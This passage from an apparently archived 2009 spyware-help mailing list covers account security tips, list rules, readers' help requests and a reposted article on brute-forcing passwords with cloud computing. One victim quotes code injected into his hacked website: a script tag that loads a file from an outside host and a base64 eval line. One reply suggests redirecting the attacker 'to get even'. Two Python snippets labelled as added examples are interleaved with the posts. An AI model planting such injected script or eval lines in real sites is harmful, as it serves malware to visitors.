friend with an attachment you didn't expect, don't be afraid to ask the sender
what it is before you decide whether to open it.

5. Make sure your account recovery information is up-to-date. Your account
recovery information helps you regain access to your account if you ever forget
your password, or if someone gains access to your account without your
permission. We currently offer several paths to account recovery. Every Gmail
user must select a security question and answer - be sure to choose a
combination that is easy for you to remember, but hard for others to guess or
come across by investigating. Don't choose a question like "What is my favorite
color?" as others may easily guess the answer. We also encourage you to provide
a secondary email address and/or a mobile phone number, so we can send you a
link to reset your password if you lose access to your account.

You can find additional security tips for Gmail in our Help Center. Learn more
about protecting your computer, website, and personal information by checking
out our security series on the Google blog or visiting
http://www.staysafeonline.org.


#5311 From: spyware@yahoogroups.com
Date: Sun Nov 1, 2009 11:11 am
Subject: File - Monthly Message to Mailing List Members
spyware@yahoogroups.com
 
To all Spyware Mailing List members -

This is a monthly informational message to all members that provides basic
information about the mailing list.

Purpose of this Mailing List
----------------------------
This group is a PC and Internet Security Mailing list dedicated to providing
news and updated tools against spyware, adware, malware, virus, trojans, worms,
spam and other computer pests... by both removing and preventing them, on any
platform ( Windows, MacOS, Linux, etc. ). We welcome new members! This group is
moderated.


Posting Messages
----------------
Any member can post a message to the list by sending email to
spyware@yahoogroups.com. The following rules apply to posted messages:

a) BE KIND - Harassing other members, web team, moderators, the administration,
being rude, posting multiple messages with nonsense, running promotional ads
and/or spamming will just get you banned. No name calling, no vulgar language,
no promotion or links to offtopic sites.

b) NO SPAMMING! NO OFFTOPIC! NO WAREZ! NO TROLLING! - Do not use this mailing
list to promote pyramid schemes and other commercial sites. This includes
position openings by headhunters and recruiters. Also no discussion of illegal
activities such as software piracy and other intellectual property violations
will be allowed at all.

c) THINK BEFORE YOU POST - Unlike other mailing lists we do not entertain random
blobs of scribbles and nonsense, be constructive in what you have to say. Do not
post the same message on multiple threads, this is a form of spamming. Do not
hold at ransom other members that don't share your opinion.

d) NO NEGATIVITY, RACIAL OR POLITICAL STANCES - We believe that everyone is
entitled to their own point of view, but this does not mean that you have to
become negative, rude, distasteful, etc. Adding to this mailing list your
Anti-Microsoft, Anti-Apple, or Anti-Linux sentiment is NOT TOLERATED in the
LEAST! We are not saying you have to believe in what anyone says, but you do
need to respect their view(s). It is okay to be disagreeable so long as it is
done in a polite way.

e) BE ACTIVE - What is the point of joining a community to say nothing? Please
reply and contribute to the conversations. :)

f) EMAILS FROM US - We may send you newsletters about updates to this mailing
list. If you don't wish to receive emails from us, please edit your membership
by choosing how do you want messages to be delivered. There are 4 options:
'Individual emails' (sends individual email messages), 'Daily digest' (sends
many emails in one message), 'Special notices' (only sends important update
emails from the group moderators) and 'No email' (will not send emails, you'll
need to read the messages at the Web site).

g) NO PATCH, NO FLAWS - We moderators believe any security flaws should only be
posted when a solution/patch has been already released.

h) NO ATTACHMENTS - Attachments to messages are automatically removed.


Replying to Messages
--------------------
The mailing list has been set up so that replies to messages are sent to the
entire list. If you wish to reply only to the poster, be sure that you send only
private mail to that person.

Before sending a reply to everyone in the mailing list, ask yourself, "is my
response of interest only to the person to whom I am replying, or is my response
of general interest?"


Changing Email Options
----------------------
The following options are available:

* Individual E-mails. Every posting will arrive in your inbox as a separate
message.
* Daily digest. You will receive one e-mail message per day with all of the
day's postings.
* Special Notices. You will receive only administrative messages sent from the
mailing list owner.
* No Email. Select this option if you need to temporarily stop receiving email
messages. You can still view messages by going to the group's website at
http://groups.yahoo.com/group/spyware

To edit your e-mail options, go to http://groups.yahoo.com/group/spyware , join
and select the desired option in the Message Delivery section. Then, press Save
Changes button.


Joining the Mailing List
------------------------

Any person can become a member by performing any of the following:

A. joining directly at http://groups.yahoo.com/group/spyware
B. sending e-mail to spyware-subscribe@yahoogroups.com
C. accepting an invitation e-mail

An invitation e-mail can be sent by any current member of the mailing list. The
invitation is sent by clicking the "invite" link found on home page (
http://groups.yahoo.com/group/spyware ).

All memberships are approved automatically. A copy of the mailing list rules is
sent to each new member.


Leaving the Mailing List
------------------------
Any member may remove him/herself from the mailing list by sending e-mail to
spyware-unsubscribe@yahoogroups.com


Contacts
--------
Any mailing list member may send e-mail directly to the mailing list owner by
sending to spyware-owner@yahoogroups.com


Thank you for your time.

- the admin

#5312 From: biksham
Date: Thu Oct 29, 2009 7:40 pm
Subject: Re: My website is hacked by some body, please help me.
biksham
 
I will try your suggestions. Thank you Brian for your help.
Biksham.


--- In spyware@yahoogroups.com, b <ercoupeflyer@...> wrote:
>
> .htaccess is documented on the apache web site documentation, It will give you
> all the information you need.
>
> php is in debug mode when a flag is set in the php config file, if you don't
> have access to it, you don't have to worry, but check your directories for
> something like php5.conf etc..
>
> make sure debug level logging is turned on for your web server then review the
> access log, looking for ip address at the time of the change, then you do a
> lookup to see where it is coming from, you can do two things, direct that
> address in your website using .htaccess to the FBI/NSA/DARPA web site, or some
> tracking website... it's fun to get even and may scare him to stop.
>
> I suspect from your comment that your home computer was hacked or you accessed
> your web site admin from a public computer and they got your password from that!
>
> Sorry to take too long getting back to you
>
> Brian
>
> --- On Sat, 10/24/09, biksham <no_reply@yahoogroups.com> wrote:
>
> From: biksham <no_reply@yahoogroups.com>
> Subject: [spyware] Re: My website is hacked by some body, please help me.
> To: spyware@yahoogroups.com
> Date: Saturday, October 24, 2009, 1:39 PM
>
> Hi there,
>
> First I would like to thank you for your reply.
>
> 1) I've AVG software on my pc which I've purchased recently after I got
> attacked.
> 2) I changed the passwords for all of my ftp accounts.
> 3) How would I check whether my php is running debug mode or not? I did
> not have .htaccess in all the directories.
> Could you please let me know how to setup the .htaccess file.
> 4) I did change all the file permission to "read" only but he changing
> write.
> 5) How to figure out who is hacking my site in log file. I've checked my
> log file but I don't see that. Could you please give me more information
> about the log file.
>
> Note: I changed my all ftp passwords and not accessing ftp accounts from
> home computers, since then they did not attack.
> Let see whether they are going to come back or not.
>
> Thanks again.
>
> Bunny.
>
> --- In spyware@yahoogroups.com, "ercoupeflyer" <ercoupeflyer@...> wrote:
> >
> > 1) ensure you have a good antivirus on your personal local computer,
> > and that there is no spy running on your computer before you access
> > your web page, be sure to always use https or secure password when
> > accessing the site.
> >
> > 2) change all your passwords at once for your web site. ensure you do
> > in fact have a password for your website admin.
> > godaddy is very secure in preventing access to os etc, but not badly
> > managed pages.
> >
> > 3) make sure you have added the security file .htaccess to all of your
> > directories on your website which prevents access/writing. Make sure php
> > is not in debug mode..
> >
> > 4) make all files read only or rx
> >
> > 5) check the log files to see who is hacking or attempting to hack
> > your site and notify the service provider of the ip, ask to shut it
> > down,(this probably will fall on deaf ears, but at least you let someone
> > know!
> >
> > --- In spyware@yahoogroups.com, biksham no_reply@ wrote:
> > >
> > > Hello there,
> > >     I have a website called eBlueFox.com. Since 3 weeks some body hacking
> > > my website
> > > and adding some kind of virus. My website files are in php and html
> > > code.
> > > They are adding following code in php and html files.
> > >
> > > 1)If its html file then adding the following code before <body> tag
> > > <script src=http://dr-mhashim.com/ContactUs/myalbum.php ></script>.
> > >
> > > 2) If its php file then adding the following code before the first line
> > > of code.
> > >
> > > <?php
> > > eval(base64_decode('...')); ?>
>
> > >
> > > 3) Before they were adding "<iframe" some etc... code before the body
> > > and end of the file. But they changed the strategy. I'm
> > > keep on cleaning and So far I did 5 times.
> > > 4) I've talked to the hosting company (godaddy.com) support group. They
> > > said their servers are very
> > > secured and there is some thing I need to control. I don't understand
> > > what should I do. It's driving me crazy.
> > > 5) Some body suggested me to change the file permission to read only. I
> > > did that one too. But no luck, next day
> > > he is changing the file permission to "read,write, and execute" and added
> > > spam.
> > >   Please..please.. help me to stop the spam.
> > >
> > >   Thank you and I would appreciate for your help.
> > >
> > >   Reg
> > >   Bunny.
> > >
> > > [Non-text portions of this message have been removed]
> > >
> >
>
> [Non-text portions of this message have been removed]
>

#5313 From: Samantha MacDonald <samanthaaust@...>
Date: Mon Nov 2, 2009 2:31 am
Subject: I have a problem.
samanthaaust
 
Hello there. I am new to the Group, my name is Samantha living northern suburbs
of Brisbane.

Just a query if I may? The past couple of weeks I have had my Hotmail contact
list compromised, I think the term is Phished, but Spammed could be the term
too, I am unsure. It happens this way.

An email comes in from an old acquaintance of whom has deleted me from his or her
MSN Messenger or Hotmail account. Then more past acquaintances who used to be in
my contacts list, but I deleted over the years, are in touch with me, people
whom I have not had anything to do with for years. The email heading is "Hello
D:" or MSN Blocker. It is all about who has deleted me from their contact list.
This programme has unearthed some old contacts. Actually one point I will make
is, one contact has passed away, and yet his email address has been pulled up.
I can copy and paste the email if anyone would like to shed some light on this.

I have run scans such as Malwarebytes, Windows Defender, AVG, all show I have
no virus. But does this mean I do not have a worm? I have been in touch with
MSN and they in turn have referred me to a link to help me with this, but the
link does not open. Something about the web page cannot display the page. From
what I am led to believe this problem started from MSN WindowsLive.

I am not alone in this. I have read complaints from all over the world in MSN
posts and groups. But no one has come up with an answer to be rid of this
parasite.

Has anyone on here had the same trouble?

I will await your response,

Thanks,

Samantha




      

[Non-text portions of this message have been removed]

#5314 From: amy.licious
Date: Fri Nov 6, 2009 7:12 am
Subject: Re: I have a problem.
amy.licious
 
Hi Samantha, and Thanks for Joining Spyware!

Your problem is unclear, although we can take some guesses from your comments.

First, It sounds like you can rest easy that you have probably not contracted
Malware of any sort; it sounds more like a Spam issue ~~ or, and please do not
take offense ~~ an issue understanding Microsoft's ever~changing Hotmail
protocols regarding MSN Messenger and Hotmail Buddy Lists. Not to worry ~ no one
understands them, which is why so few people who have a choice use those two
programs anymore.

I'd make certain I'm not using Microsoft's web browser, Internet Explorer,
although it must be used for Windows Updates etc and certain, extremely few web
sites / pages around the internet. This Group does not approve of IE for a
number of reasons, but a single component of IE called ActiveX has created the
lion's share of Spyware, historically.

We formally support Mozilla's web browser, Firefox (www.firefox.com).
Informally, Opera (www.opera.com) and Google's Chrome (www.google.com/chrome)
are superb as well. Firefox is the most user~friendly, so I might recommend it
to start.

Second, with your Firefox browser, please go to mail.google.com and establish a
Google GMail account.

Third, copy from your Hotmail (and whatever other) account(s) a completely
up~to~date list of people with whom you'd like to correspond. From your new
GMail account, send a circular memo to all of those people that you've changed
your Hotmail email account over to Google's GMail and to please cancel your old
Hotmail address and replace it with your new GMail address.

Then, you'll discover the benefits of the Firefox browser and the GMail account.
One that I suspect you may like is that GMail's Spam catcher is ruthless,
compared to Hotmail or Yahoo Mail ~ but you must help GMail to help you by using
a more secure browser such as Firefox.

Happy Computing!
~Amy:)

Spyware@yahoogroups.com, Samantha MacDonald <samanthaaust@...> wrote:
>
> Hello there. I am new to the Group, my name is Samantha living northern
> suburbs of Brisbane.
>
> Just a query if I may? The past couple of weeks I have had my Hotmail
> contact list compromised, I think the term is Phished, but Spammed could be the
> term too, I am unsure. It happens this way.
>
> An email comes in from an old acquaintance of whom has deleted me from his or
> her MSN Messenger or Hotmail account. Then more past acquaintances who
> used to be in my contacts list, but I deleted over the years, are in touch with
> me, people whom I have not had anything to do with for years. The email
> heading is "Hello D:" or MSN Blocker. It is all about who has deleted me from
> their contact list. This program has unearthed some old contacts. Actually one
> point I will make is, one contact has passed away, and yet his email address
> has been pulled up. I can copy and paste the email if anyone would like to
> shed some light on this.
>
> I have run scans such as Malwarebytes, Windows Defender, AVG, all show I have
> no virus. But does this mean I do not have a worm? I have been in touch
> with MSN and they in turn have referred me to a link to help me with this, but
> the link does not open. Something about the web page cannot display the page.
> From what I am led to believe this problem started from MSN Windows Live.
>
> I am not alone in this. I have read complaints from all over the world in
> MSN posts and groups. But no one has come up with an answer to be rid of this
> parasite.
>
> Has anyone on here had the same trouble?
>
> I will await your response,
>
> Thanks,
>
> Samantha
>

#5315 From: amy.licious
Date: Fri Nov 6, 2009 7:03 pm
Subject: Using Cloud Computing to Crack Passwords
amy.licious
 
Using Cloud Computing To Crack Passwords - Amazon’s EC2
Darknet spilled these bits on November 3rd 2009 @ 10:07 am

Now this is interesting, a proper mathematical calculation for using cloud
computing to crack passwords, now Amazon has opened up their EC2 (Elastic
Compute Cloud) the cost of massive parallel processing power has come right
down.

And guess what, someone thought of using it to crack passwords. It seems the
cut-off would be a 12 character password as even with all lower case characters
it would cost USD1.5 million to crack.

It gets exponentially cheaper as you remove each character (due to the
calculation using the power of the number of characters) so a 10 character
password would only cost you just over USD2000!

     Forget what you’ve learned about password security. A simple pass code
with nothing more than lower-case letters may be all you need - provided you
use 12 characters.

     That’s the conclusion of security consultant David Campbell, who
calculated the cost of waging a brute-force attack on various types of passwords
using cloud computing services offered by Amazon.

     Based on hourly fees Amazon charges for its EC2 web service, it would cost
more than $1.5m to brute force a 12-character password containing nothing more
than lower-case letters a through z. But user beware, an 11-character code costs
less than $60,000 to crack, and a 10-letter phrase costs less than $2,300.

     Adding upper-case letters and numbers to a password offers some additional
security, but not as much as you might think. Such a phrase using 10 characters
would cost less than $60,000 to attack, while an 11-character code would cost
roughly $2.1m. Even passwords that contain an additional 32 characters such as
!@#$% are relatively cheap to crack if they are short enough. An eight-character
password would cost a little more than $106,000.

I’d say adding upper case letters and numbers makes quite a difference, a 10
character password jumps from just over USD2000 to crack all the way up to
USD60,000. That’s a factor of 30!

I’d say a 10 character password containing uppercase, lowercase, numbers and
special characters should be well into the millions and keep you fairly safe.

I did write some guidelines and tips on creating a secure password a while back,
you can check it out here - Good Password Guidelines - How to Make a
Strong/Secure Password.

     The analysis, which Campbell posted here, builds off of research fellow
security consultant Haroon Meer of SensePost presented earlier this year at the
Black Hat conference. In it, he showed how EC2 could provide criminals using
stolen credit cards with the equivalent of a super computer to crack encryption
keys and passwords.

     And that, in turn, will require new ways of thinking on the part of white
hats.

     “As it becomes possible now for the black hat community to get their hands
on large amounts of computing power, we as security professionals are going to
need to reassess threat models that we thought previously were not a factor,”
said Campbell. “Using stolen credit cards, they could create a super computer
that would be faster potentially than what the three-letter agencies have and
they wouldn’t be paying for the CPU cycles.”

     Although Amazon takes pains to ration resources it makes available to single
customers, Meer showed it was possible to get around such limitations using a
single credit card. Presumably, it would be even easier to bypass those controls
using hundreds or thousands of stolen credit cards, something that is trivial
for criminals to get a hold of. Campbell’s assumptions are based on simple
arithmetic.

It’s interesting research nevertheless, I’d say Cloud Computing is only
going to get more powerful and cheaper to rent so character based passwords may
become completely defunct at some point in the future.

The computing power is not at the point where you have to worry about your 1024
bit RSA encryption quite yet, but it may well be in the near future as it’s
already advised to use a 2048 bit key length!

Combining this platform with the abundance of stolen credit card details the
blackhats have could be quite devastating.

Source: The Register
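
The scaling argument in the post above ("to the power of the number of characters") can be turned into a password-policy check. This is an added example, not part of the original post or of Campbell's analysis: it assumes cost is strictly proportional to keyspace and calibrates on the article's single figure of $1.5m for 12 lower-case letters, which reproduces the article's 11- and 10-letter lower-case figures. Results for the other alphabets follow from that one anchor and are this example's own, and the alphabet labels are hypothetical names.

```python
import math

# Anchor figure quoted in the article: brute-forcing 12 lower-case letters
# costs "more than $1.5m" at 2009 EC2 prices.
ANCHOR_ALPHABET, ANCHOR_LENGTH, ANCHOR_COST_USD = 26, 12, 1_500_000

# Alphabet sizes the article discusses (labels are this example's own).
ALPHABETS = {
    "lower": 26,
    "lower+upper+digits": 62,
    "lower+upper+digits+32 symbols": 94,
}


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of candidate passwords of exactly `length` characters."""
    return alphabet_size ** length


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Bits of entropy of a uniformly random password."""
    return length * math.log2(alphabet_size)


def exhaustive_cost_usd(alphabet_size: int, length: int) -> float:
    """Cost to try every candidate, assuming cost is proportional to keyspace
    and calibrated on the article's 12-lower-case-letter figure."""
    per_guess = ANCHOR_COST_USD / keyspace(ANCHOR_ALPHABET, ANCHOR_LENGTH)
    return per_guess * keyspace(alphabet_size, length)


def min_length_for_budget(alphabet_size: int, budget_usd: float) -> int:
    """Shortest length whose exhaustive search costs at least `budget_usd`."""
    length = 1
    while exhaustive_cost_usd(alphabet_size, length) < budget_usd:
        length += 1
    return length


def policy_table(budget_usd: float) -> list:
    """One row per alphabet: (label, minimum length, entropy bits, cost)."""
    rows = []
    for name, size in ALPHABETS.items():
        n = min_length_for_budget(size, budget_usd)
        rows.append((name, n, round(entropy_bits(size, n), 1),
                     exhaustive_cost_usd(size, n)))
    return rows


if __name__ == "__main__":
    for name, n, bits, cost in policy_table(1_000_000):
        print(f"{name:32} min length {n:2}  {bits:5.1f} bits  ~${cost:,.0f}")
```

The figures are for exhausting the whole keyspace of a uniformly random password; a password built from dictionary words or reused elsewhere falls far sooner than its length suggests.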

#5316 From: "manthorpe" <manthorpe@...>
Date: Fri Nov 6, 2009 1:40 pm
Subject: DRPU PC Data Management concern
manthorpe
 
Anyone know what 'DRPU PC Data Management' is, what it does and how it could have
got onto a friend's computer? I tried to search for information on it and can
only find links to download it and I don't want to do this.
I've been told that it can't be picked up from the net, could the user have
somehow mistakenly downloaded and installed it without realizing it was a
keylogger?
The user is trying to blame a technician for installing it.
Any help would be greatly appreciated.

#5317 From: Steven Plisk <steve@...>
Date: Fri Nov 6, 2009 5:19 pm
Subject: browsers
ssp67047
 
amy.licious  wrote:
We formally support Mozilla's web browser, Firefox (www.firefox.com).
Informally, Opera (www.opera.com)
and Google's Chrome (www.google.com/chrome) are superb as well.
Firefox is the most user~friendly, so I might recommend it to start.
----------

Amy,

Great recommendation. I'm a big fan of Firefox as well.

The one criticism of it seems to be its system resource usage, which can be a
bit on the heavy side compared with IE. I know there are some ways to tweak
Firefox so it's a bit less of a hog, but it's challenging finding a good web
source offering simple guidelines for this. Are there any you would recommend?

Thanks and regards,


Steven Plisk
Management Systems Associates LLC • Shelton CT
www.management-sa.com • pcsecurity.boomja.com
Business Software Solutions Since 1981


#5318 From: Samantha MacDonald <samanthaaust@...>
Date: Sun Nov 8, 2009 11:44 pm
Subject: Re: Re: I have a problem.
samanthaaust
 
Thank you Amy so much for your help.  I have just opened a GMail account and
now I will Export all of my Hotmail contacts to it.  Having been ten years
with the same hotmail account a change is well overdue.  I have not been happy
with Hotmail for some time now, for various reasons.
 
Thank you so much,
 
Samantha

#5319 From: spyware@yahoogroups.com
Date: Tue Nov 10, 2009 7:51 am
Subject: [ Patch Tuesday ] Microsoft security patches available today, 11/10/2009, 12:00 am
spyware@yahoogroups.com
 
Reminder from:   spyware Yahoo! Group
 
Title:   [ Patch Tuesday ] Microsoft security patches available today
 
Date:   Tuesday November 10, 2009
Time:   All Day
Repeats:   This event repeats every month on the second Tuesday.
Notes:   Patch Tuesday is the second Tuesday of each month, the day on which Microsoft releases security patches. You are advised to run Windows Update today.
 

#5320 From: "Sophie" <sofievigneau@...>
Date: Tue Nov 10, 2009 6:32 pm
Subject: microsoft window open all the time
sofievigneau
 
hi everybody
first, i'm french, so sorry if i've got mistakes in my message....
i have a big problem with some "messages from microsoft window" and even if i
try to take it off, they come back right away.... example:
- COM surrogate don't work anymore-
- microsoft Sync center don't work anymore -
and everytime that i try to press on "x" to take it off...that comes back again,
and again...
it is a spyware?
i did scan my computer with malwarebytes, and it seems to be good, no virus found
in my computer
thanksssssssssssssssssssssss
maybe i will have to format my computer ?

#5321 From: "Sophie" <sofievigneau@...>
Date: Tue Nov 10, 2009 7:03 pm
Subject: the sniffer msn program
sofievigneau
 
does anyone know about "the sniffer msn something"
i don't know the exact word but this program, spying you, everything that
you....they can go in your mail on msn and see all your messages.... i've got
problem all summer with someone who used this...and he still doing it...i need
help
and i receive e-mail from him too...he call him d.j. gang and i want to know if i
can retrace him...with his ip address?
thankssssss

#5322 From: "antibotnet" <antibotnet@...>
Date: Mon Nov 16, 2009 9:45 pm
Subject: Re: the sniffer msn program
antibotnet
 
Apparently less than a handful of Google search results showing these
softwares...


MSN Sniffer 2
MSN Sniffer makes it easy to view captured messages of each conversation in real
... MSN Sniffer Lite shows conversation list only, and there is no auto-save
feature. ...
www.msnsniffer.com

MSN Sniffer | Capture MSN messenger chat on your network
Provides sniffer software, spy software, monitoring software. ... Just run the
MSN sniffer on any computer on your network, and start to capture. ...
www.msn-sniffer.com

In Spyware category threats you will want to research keyloggers and screen
captures. With surveillance monitoring software one must check their State Laws
as to whether they are legally able to be used - when and where and by whom. In
your case of apparently being "spied upon" - it may very well have been a
violation of sorts.

THREAT INFO LINKS....

Keystroke logging
From Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Keylogger

Keyloggers defined
http://www.webopedia.com/TERM/K/keylogger.html

Screenshot
From Wikipedia, the free encyclopedia
http://en.wikipedia.org/wiki/Screenshot
(Various spywares are able to transmit all you see)

IP Address can be found in the message headers.


--- In spyware@yahoogroups.com, "Sophie" <sofievigneau@...> wrote:
>
> does anyone know about "the sniffer msn something"
> i don't know the exact word but this program, spying you, everything that
> you....they can go in your mail on msn and see all your messages.... i've got
> problem all summer with someone who used this...and he still doing it...i need
> help
> and i receive e-mail from him too...he call him d.j. gang and i want to know if
> i can retrace him...with his ip address?
> thankssssss
>
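
Reading the addresses out of the message headers mentioned in the reply above, as an added example that is not part of the original post: it parses the `Received` lines of a constructed message and separates the address recorded by the recipient's own provider from the one merely claimed by the sending side. All host names and addresses are placeholders, and the function names are this example's own.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample; hosts and addresses are placeholders (documentation ranges).
RAW = """\
Received: from mx.recipient.example (mx.recipient.example [198.51.100.7])
\tby inbox.recipient.example with ESMTP id abc123;
\tTue, 10 Nov 2009 19:05:02 +0000
Received: from relay.sender.example (relay.sender.example [203.0.113.25])
\tby mx.recipient.example with ESMTP id def456;
\tTue, 10 Nov 2009 19:05:01 +0000
Received: from [192.168.1.20] (unknown [192.0.2.44])
\tby relay.sender.example with ESMTPA id ghi789;
\tTue, 10 Nov 2009 19:05:00 +0000
From: someone@sender.example
To: me@recipient.example
Subject: constructed sample

body
"""

LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def is_public(ip_text):
    """True for a syntactically valid IPv4 address outside LAN/loopback ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in LOCAL_NETS)


def parse_hops(raw):
    """Return one dict per Received header, newest hop first (top of message)."""
    hops = []
    for value in message_from_string(raw).get_all("Received", []):
        text = " ".join(value.split())            # unfold continuation lines
        from_part, _, rest = text.partition(" by ")
        by_host = rest.split()[0] if rest else None
        ips = [ip for ip in BRACKET_IP.findall(from_part) if is_public(ip)]
        hops.append({"by": by_host, "ips": ips})
    return hops


def trusted_sender_ip(raw, my_domain):
    """IP that connected to my own provider: the oldest hop stamped by my_domain.
    Headers below that hop were written by other parties and can be forged."""
    boundary = None
    for hop in parse_hops(raw):
        host = hop["by"] or ""
        if host == my_domain or host.endswith("." + my_domain):
            boundary = hop
        else:
            break
    return boundary["ips"][-1] if boundary and boundary["ips"] else None


def claimed_origin_ip(raw):
    """Oldest hop's public IP: a lead only, since the sending side wrote it."""
    for hop in reversed(parse_hops(raw)):
        if hop["ips"]:
            return hop["ips"][-1]
    return None
```

A forged header that imitates your provider's host name would defeat the suffix match, so compare against the exact host names your provider uses. Many webmail services record only their own servers, in which case the address identifies the mail provider rather than the person.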

#5323 From: Sophie Vigneau <sofievigneau@...>
Date: Wed Nov 18, 2009 1:51 am
Subject: Re : Re: the sniffer msn program
sofievigneau
 
THANKSSSSSSSSSSSSSSS A LOT FOR YOUR MESSAGE
XXX
